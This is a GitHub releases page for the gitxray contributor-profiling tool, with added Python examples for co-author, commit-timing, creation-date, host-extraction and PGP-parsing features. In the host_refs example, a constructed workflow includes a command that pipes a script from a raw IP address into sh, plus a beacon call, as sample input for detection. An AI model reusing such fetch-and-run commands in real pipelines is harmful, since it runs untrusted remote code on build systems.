Releases: kulkansecurity/gitxray

1.0.20

09 Jan 17:32
def9281

Release v1.0.20 (January 9th, 2026)

  • Added a commit co-author analysis feature that parses Co-authored-by: trailers in commit messages to collect additional e-mail addresses. We also check whether the same co-author appears in commits made from different accounts.
  • Added pattern analysis of commit timing: we detect automated/bot activity (warning when an account has commits in more than 22 of the 24 hours of the day), classify commits as inside or outside working hours (including weekday/weekend patterns), infer timezones from 190+ countries and cities worldwide, and convert UTC commit hours to local time so that the timezone-aware analysis can flag night-time activity or a mismatch with the stated location. Finally, we also identify coordinated timing across accounts.
  • Fixed duplicate entries in HTML report highlights section by deduplicating warnings before rendering.
  • Fixed similar repository name search to use exact name matching instead of partial/fuzzy search, and corrected API sort parameters from 's'/'o' to 'sort'/'order' to properly sort by stars, preventing false warnings about repository rating.
  • Fixed typo in contributors_xray.py where pgp_pulicKeyAlgorithm should have been pgp_publicKeyAlgorithm, preventing PGP public key algorithms from being collected from signature attributes.
  • Fixed timezone handling in gh_time.py to ensure all parsed GitHub timestamps are timezone-aware (UTC), preventing "can't subtract offset-naive and offset-aware datetimes" errors.
  • Fixed workflow run count calculation in workflows_xray.py where contributor/non-contributor run counts were incremented by 1 instead of the actual number of runs, causing incorrect totals in summary output.
  • Fixed case sensitivity bug in workflows_xray.py where check for ACTIONS_ALLOW_UNSECURE_COMMANDS was uppercase but content was lowercased, causing the check to never match.
  • Fixed type inconsistency in contributors_xray.py where primary key email dict objects were appended to contributor_emails list instead of email strings, breaking duplicate detection and anonymous user matching.
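
The co-author analysis above, as an added example in Python (not gitxray's own code): it parses Co-authored-by: trailers, collects the extra e-mail addresses per account, and reports co-authors that show up under more than one account login. The commit messages and logins are constructed sample data, and the regex and matching rules are this example's assumptions rather than the project's.

```python
import re

# Git trailer line as used by GitHub: "Co-authored-by: Name <email>".
# Matched case-insensitively (git treats trailer keys case-insensitively); name and
# email are confined to one line so a trailer can never span two lines.
COAUTHOR_RE = re.compile(
    r"^co-authored-by:[ \t]*(?P<name>[^<\n]*?)[ \t]*<(?P<email>[^>\n]+)>[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_coauthors(message):
    """Return (name, email) pairs from Co-authored-by trailers; emails are lower-cased for matching."""
    return [(m.group("name"), m.group("email").strip().lower()) for m in COAUTHOR_RE.finditer(message)]


def coauthor_emails_by_login(commits):
    """commits: iterable of (author_login, message). Map each login to the co-author emails it has used."""
    emails = {}
    for login, message in commits:
        bucket = emails.setdefault(login, set())
        bucket.update(email for _, email in parse_coauthors(message))
    return emails


def shared_coauthors(commits):
    """Co-author emails that appear in commits of more than one login, with the logins that used them.

    A co-author shared across otherwise unrelated accounts hints that the accounts are linked
    (same person, same team, or the same tooling adding the trailer).
    """
    logins_by_email = {}
    for login, message in commits:
        for _, email in parse_coauthors(message):
            logins_by_email.setdefault(email, set()).add(login)
    return {email: sorted(logins) for email, logins in logins_by_email.items() if len(logins) > 1}


# Constructed sample commits: (author login, commit message).
SAMPLE_COMMITS = [
    ("alice", "Add parser\n\nCo-authored-by: Bob <bob@example.com>"),
    ("carol", "Fix tests\n\nCo-Authored-By: Bob <Bob@Example.com>\nCo-authored-by: Dave <dave@example.com>"),
    ("carol", "Refactor\n\nCo-authored-by: Dave <dave@example.com>"),
    ("erin", "Docs only"),
]

if __name__ == "__main__":
    print(coauthor_emails_by_login(SAMPLE_COMMITS))
    print(shared_coauthors(SAMPLE_COMMITS))
```

Trailer keys are matched case-insensitively and e-mail addresses are lower-cased before comparison; without that, `Bob@Example.com` and `bob@example.com` would be counted as two different co-authors and the cross-account link would be missed.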

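The timing analysis and the timezone-aware timestamp fix from the two bullets above, as one added Python example that is not gitxray's own code: every GitHub timestamp is parsed into an aware UTC datetime (so no naive/aware subtraction can occur), converted to a local time, and summarised into the distinct-hours bot heuristic, work-hours/weekend/night counts, and a coordinated-timing check across accounts. The city-to-offset table, the work-hour and night-hour boundaries, the 5-minute coordination window and the commit timestamps are all constructed assumptions of this example.

```python
from datetime import datetime, timedelta, timezone


def parse_gh_time(value):
    """Parse a GitHub API timestamp such as '2026-01-09T17:32:05Z' into an aware UTC datetime.

    GitHub emits ISO 8601 with a trailing 'Z'; datetime.fromisoformat() only accepts 'Z'
    from Python 3.11, so it is normalised to '+00:00' first. The result is always aware,
    which is what prevents "can't subtract offset-naive and offset-aware datetimes".
    """
    if value.endswith("Z"):
        value = value[:-1] + "+00:00"
    parsed = datetime.fromisoformat(value)
    if parsed.tzinfo is None:  # defensive: a naive value is taken to be UTC
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


# Constructed stand-in for the tool's city/country-to-timezone inference: fixed UTC offsets
# in hours (no DST handling; a real implementation would use zoneinfo).
OFFSETS = {"Buenos Aires": -3, "Berlin": 1, "Kolkata": 5.5, "Tokyo": 9}


def to_local(utc_dt, location):
    return utc_dt.astimezone(timezone(timedelta(hours=OFFSETS[location])))


def timing_profile(timestamps, location, bot_hour_threshold=22):
    """Summarise one account's commit timing in the local time of `location`.

    bot_like mirrors the "commits in more than 22 distinct hours of the day" heuristic;
    work hours are taken as Mon-Fri 09:00-17:59 and night as 23:00-05:59 (constructed choices).
    """
    local = [to_local(parse_gh_time(ts), location) for ts in timestamps]
    distinct_hours = {dt.hour for dt in local}
    work = sum(1 for dt in local if dt.weekday() < 5 and 9 <= dt.hour < 18)
    weekend = sum(1 for dt in local if dt.weekday() >= 5)
    night = sum(1 for dt in local if dt.hour >= 23 or dt.hour < 6)
    return {
        "commits": len(local),
        "distinct_hours": len(distinct_hours),
        "bot_like": len(distinct_hours) > bot_hour_threshold,
        "work_hours": work,
        "outside_work_hours": len(local) - work,
        "weekend": weekend,
        "night": night,
    }


def coordinated_accounts(commits_by_login, window=timedelta(minutes=5)):
    """Return sorted login pairs that committed within `window` of each other at least once."""
    events = sorted((parse_gh_time(ts), login) for login, stamps in commits_by_login.items() for ts in stamps)
    pairs = set()
    for i, (first, login_a) in enumerate(events):
        for later, login_b in events[i + 1:]:
            if later - first > window:  # events are sorted, so nothing later can be inside the window
                break
            if login_a != login_b:
                pairs.add(tuple(sorted((login_a, login_b))))
    return sorted(pairs)


# Constructed sample data: one account committing every hour of Monday 2026-01-05 (UTC),
# one committing a few times during the day, and three accounts for the coordination check.
BOT_COMMITS = [f"2026-01-05T{hour:02d}:15:00Z" for hour in range(24)]
HUMAN_COMMITS = ["2026-01-05T13:05:00Z", "2026-01-05T16:40:00Z",
                 "2026-01-06T12:10:00Z", "2026-01-07T19:30:00Z"]
GROUP = {
    "alice": ["2026-01-05T13:05:00Z"],
    "bob": ["2026-01-05T13:07:30Z"],
    "carol": ["2026-01-05T20:00:00Z"],
}

if __name__ == "__main__":
    for name, commits in (("bot", BOT_COMMITS), ("human", HUMAN_COMMITS)):
        print(name, timing_profile(commits, "Buenos Aires"))
    print("coordinated:", coordinated_accounts(GROUP))
```

Converting to local time before bucketing matters: the hourly "bot" series lands three of its commits on Sunday evening in Buenos Aires, which a UTC-only analysis would count as Monday, and the night-time count shifts with the offset for the same reason.
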
1.0.19

06 Dec 21:09
1fa387d

Release v1.0.19 (December 6th, 2025)

  • Merged a fix by ThemeHackers: a small change that fixes a TypeError in gh_public_events when commits are missing (thank you!).
  • Fixed missing commits when filtering by author in very specific cases: the GitHub REST API behaves inconsistently here, and sometimes filtering by author only works if the value is an e-mail address.
  • Added, in addition to the existing check of commit date vs. account creation time, a check of commit date vs. repository creation time, which also issues a highlighted WARNING.
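
The creation-time check described in the last bullet, as an added Python example that is not gitxray's own code: each commit's author and committer dates are parsed as aware UTC datetimes and compared against the repository's and the author account's created_at values, emitting a warning line for every date that predates either. The timestamps, SHAs and warning wording are constructed for this example.

```python
from datetime import datetime, timezone


def parse_gh_time(value):
    """GitHub API timestamp ('2025-03-01T00:00:00Z') -> aware UTC datetime, so no naive/aware mix-ups."""
    if value.endswith("Z"):
        value = value[:-1] + "+00:00"
    parsed = datetime.fromisoformat(value)
    if parsed.tzinfo is None:
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


def creation_time_warnings(commit, repo_created_at, account_created_at=None):
    """Flag commits whose author or committer date predates the repository or the author's account.

    commit: {'sha', 'author_date', 'committer_date'} holding GitHub API timestamp strings.
    account_created_at is None when the author is anonymous (not linked to a GitHub account).
    Both git dates are user-controlled (git commit --date, GIT_COMMITTER_DATE), so a hit is a
    warning, not proof: imported or rebased history can legitimately predate repository creation.
    """
    warnings = []
    repo_created = parse_gh_time(repo_created_at)
    account_created = parse_gh_time(account_created_at) if account_created_at else None
    short = commit["sha"][:7]
    for field in ("author_date", "committer_date"):
        when = parse_gh_time(commit[field])
        if when < repo_created:
            warnings.append(f"WARNING {short}: {field} {when.isoformat()} "
                            f"predates repository creation {repo_created.isoformat()}")
        if account_created is not None and when < account_created:
            warnings.append(f"WARNING {short}: {field} {when.isoformat()} "
                            f"predates account creation {account_created.isoformat()}")
    return warnings


# Constructed sample: a repository created in March 2025 by an account created in June 2024.
REPO_CREATED = "2025-03-01T00:00:00Z"
ACCOUNT_CREATED = "2024-06-15T12:00:00Z"
SAMPLE_DATED_COMMITS = [
    {"sha": "a1b2c3d4e5f6", "author_date": "2025-03-02T10:00:00Z", "committer_date": "2025-03-02T10:00:00Z"},
    # author date rewritten to 2019: predates both the repository and the account
    {"sha": "0f9e8d7c6b5a", "author_date": "2019-01-01T00:00:00Z", "committer_date": "2025-03-05T09:00:00Z"},
]

if __name__ == "__main__":
    for commit in SAMPLE_DATED_COMMITS:
        for line in creation_time_warnings(commit, REPO_CREATED, ACCOUNT_CREATED):
            print(line)
```

Checking the committer date separately from the author date is deliberate: a backdated author date with a plausible committer date is exactly what a rebase or a `--date` override leaves behind.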

1.0.18

20 Aug 23:44
ebbb9f1

Release v1.0.18 (August 20th, 2025)

  • New 'host_refs' section/feature! Uses the GitHub Code search API to search for http(s) hosts (domains or IP addresses), including inside Workflows. It can definitely help when mapping a target's infrastructure, or when checking your own repositories for signs of malicious activity. Only works if a GH_ACCESS_TOKEN is set, since the Code search API requires an authenticated request.
  • New integration with the VirusTotal API, which is activated by setting VT_API_KEY to your VirusTotal API key. It populates a new 'host_refs_vt' section with results for any hosts previously identified in host_refs.
  • Merged the 'urls' section for contributors and repository into 'profiling'; it is only kept for non-contributors.
  • Fixed the sidebar menu in the HTML report so that the first click collapses a collapsible item directly; also fixed indentation for subitems.
  • Added an inline description to categories in the HTML report explaining why and how the data of the category can be useful.
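
The host-reference extraction that host_refs performs on search results, as an added Python example that is not gitxray's own code: it pulls every http(s) URL out of a file body (a workflow in this case), resolves the host, tells IP literals from domains, and separates expected GitHub hosts from the ones worth a second look. The workflow text, the allowlist of expected hosts and the URL regex are constructed for this example; the real feature gets its input from the GitHub Code search API.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# http(s) URLs as they appear in source, YAML and shell one-liners; stops at whitespace and quoting.
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)

# Constructed allowlist: hosts expected in almost any GitHub workflow.
EXPECTED_HOSTS = {"github.com", "api.github.com", "raw.githubusercontent.com",
                  "objects.githubusercontent.com"}


def extract_hosts(text):
    """Map every host referenced by an http(s) URL in `text` to its kind ('ip'/'domain') and its URLs."""
    hosts = {}
    for match in URL_RE.finditer(text):
        url = match.group(0).rstrip(".,;:")
        host = urlsplit(url).hostname  # lower-cased, port stripped, IPv6 brackets removed
        if not host:
            continue
        try:
            ipaddress.ip_address(host)
            kind = "ip"
        except ValueError:
            kind = "domain"
        entry = hosts.setdefault(host, {"kind": kind, "urls": set()})
        entry["urls"].add(url)
    return hosts


def unexpected_hosts(hosts, allowlist=EXPECTED_HOSTS):
    """Hosts worth a second look: raw IP literals always, domains unless allowlisted."""
    return sorted(host for host, info in hosts.items() if info["kind"] == "ip" or host not in allowlist)


# Constructed workflow: one legitimate-looking fetch from GitHub, plus curl|sh from a raw IPv4
# address, a download from an unknown domain and a beacon to an IPv6 literal.
WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: curl -sSL https://raw.githubusercontent.com/example/tool/main/setup.sh | bash
      - run: |
          curl -fsSL http://203.0.113.10:8080/bootstrap.sh | sh
          wget 'https://updates.example.net/agent.tgz'
          curl http://[2001:db8::1]/beacon
      - run: echo "https://github.com/kulkansecurity/gitxray" > README.txt
"""

if __name__ == "__main__":
    found = extract_hosts(WORKFLOW)
    for host in unexpected_hosts(found):
        print(host, found[host]["kind"], sorted(found[host]["urls"]))
```

Using `urlsplit().hostname` rather than a hand-written split is what makes ports, userinfo and bracketed IPv6 literals come out right; the IP/domain split is done with `ipaddress` so that a host like `2001:db8::1` is not mistaken for a domain name.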

1.0.17.4

27 Apr 17:52
401f4d2

Release v1.0.17.4 (April 27th, 2025)

  • Removed external links to Bootstrap CSS, JavaScript, and the Gitxray logo; now all assets (styles, scripts, images) are embedded so HTML reports are fully self-contained.
  • Merged a PR by satoridev01 which prevents Gitxray from printing stars, watchers, created, updated, contributors and anonymous if they were not found, as opposed to stating "0".

1.0.17.3

03 Mar 01:56
9a96a38

Release v1.0.17.3 (March 2nd, 2025)

  • Added handling of blocked repositories. The GitHub API returns a different error for these than for not-found repositories, and includes a reason, which we now include in our reports. Thanks to satoridev01 for reporting the behavior.

1.0.17.2

17 Feb 01:53
7dd8446

Release v1.0.17.2 (February 16th, 2025)

  • Added a Highlighted findings section to the HTML report. Special thanks to Viktor and Darin from DevOps Paradox for their feedback.
  • Added to every table in the HTML report the ability to collapse and expand.
  • Merged the finding on similar repository names with the finding on the repository being the most starred.
  • Improved the introduction section of the HTML report to guide users with sample use-cases for Gitxray.

1.0.17.1

31 Jan 02:35
ff4d407

Release v1.0.17.1 (January 30th, 2025)

  • Fixed parsing of legacy workflows which include an empty path attribute.
  • Fixed parsing of broken armored PGP keys which appear to be accepted by GitHub when being added to a user's profile.
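
The page does not say which malformation the fix tolerates, so as an added Python example (not gitxray's own parser) here is a lenient ASCII-armor reader of the kind a profile-key collector needs: it recovers whatever it can from an armored PGP block and records each defect (missing END line, bad base64, wrong or missing CRC24 line) instead of raising. The CRC-24 parameters are those of RFC 4880 section 6.1; the `armor()` builder, the header names and the key bytes are constructed test input, not real keys.

```python
import base64
import re

BEGIN_RE = re.compile(r"^-----BEGIN PGP ([A-Z ]+)-----$")
END_RE = re.compile(r"^-----END PGP ([A-Z ]+)-----$")


def crc24(data):
    """OpenPGP CRC-24 (RFC 4880 section 6.1): init 0xB704CE, polynomial 0x1864CFB."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def checksum_line(data):
    """The '=XXXX' armor checksum line for `data` (CRC-24 as 3 big-endian bytes, base64)."""
    return "=" + base64.b64encode(crc24(data).to_bytes(3, "big")).decode()


def armor(data, block_type="PUBLIC KEY BLOCK", headers=None):
    """Produce a well-formed armored block; used here only to build constructed test input."""
    b64 = base64.b64encode(data).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    header_lines = "".join(f"{key}: {value}\n" for key, value in (headers or {}).items())
    return (f"-----BEGIN PGP {block_type}-----\n{header_lines}\n{body}\n"
            f"{checksum_line(data)}\n-----END PGP {block_type}-----\n")


def parse_armor(text):
    """Lenient armor parser: returns {'type', 'headers', 'data', 'problems'} and never raises.

    Every defect found is appended to 'problems' so a caller can keep the recoverable bytes
    and still report the key as malformed rather than aborting the whole scan.
    """
    result = {"type": None, "headers": {}, "data": b"", "problems": []}
    lines = [line.rstrip("\r") for line in text.strip().splitlines()]
    begin = BEGIN_RE.match(lines[0]) if lines else None
    if begin is None:
        result["problems"].append("missing BEGIN line")
        return result
    result["type"] = begin.group(1)
    body = lines[1:]
    end_index = next((i for i, line in enumerate(body) if END_RE.match(line)), None)
    if end_index is None:
        result["problems"].append("missing END line")
    else:
        if END_RE.match(body[end_index]).group(1) != result["type"]:
            result["problems"].append("BEGIN/END block types differ")
        body = body[:end_index]
    # Armor headers ("Key: Value") come first, separated from the data by one blank line.
    index = 0
    while index < len(body) and body[index] and ": " in body[index]:
        key, value = body[index].split(": ", 1)
        result["headers"][key] = value
        index += 1
    if index < len(body) and body[index] == "":
        index += 1
    elif result["headers"]:
        result["problems"].append("missing blank line after headers")
    data_lines, checksum = [], None
    for line in body[index:]:
        if line.startswith("="):          # base64 never starts a line with '=', so this is the CRC line
            checksum = line[1:].strip()
        elif line.strip():
            data_lines.append(line.strip())
    try:
        result["data"] = base64.b64decode("".join(data_lines), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        result["problems"].append("data is not valid base64")
    if checksum is None:
        result["problems"].append("missing CRC24 line")
    else:
        try:
            expected = int.from_bytes(base64.b64decode(checksum, validate=True), "big")
        except ValueError:
            result["problems"].append("malformed CRC24 line")
        else:
            if expected != crc24(result["data"]):
                result["problems"].append("CRC24 mismatch")
    return result


if __name__ == "__main__":
    sample = armor(bytes(range(64)), headers={"Comment": "constructed"})
    print(parse_armor(sample)["problems"])                     # []
    truncated = "\n".join(l for l in sample.splitlines() if not l.startswith("-----END"))
    print(parse_armor(truncated)["problems"])                  # ['missing END line']
```

The point of keeping the decoded bytes alongside the problem list is that a key whose armor is slightly off may still carry a perfectly valid packet stream, which is what a profile analysis wants to look at; the problems themselves are a finding in their own right, since a mainstream implementation would normally have rejected the block.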

1.0.17

26 Jan 23:03
c7412b7

Release v1.0.17 (January 26th, 2025)

1.0.16.5

18 Jan 22:49
f00026e

Release v1.0.16.5 (January 18th, 2025)

  • Fixed an unhandled exception that showed up when scanning repositories with a very large list of contributors (e.g. torvalds/linux or MicrosoftDocs/azure-docs), for which the GitHub REST API responds in an undocumented manner, stating: "The history or contributor list is too large to list contributors for this repository via the API".

1.0.16.4

30 Oct 19:05
b5b63a5

Release v1.0.16.4 (October 30th, 2024)

  • Fixed an error case that should eventually be handled in gh_api.py: GitHub returning unexpected error responses when querying for certain releases while unauthenticated. Thank you once again, fearcito, for your input and testing.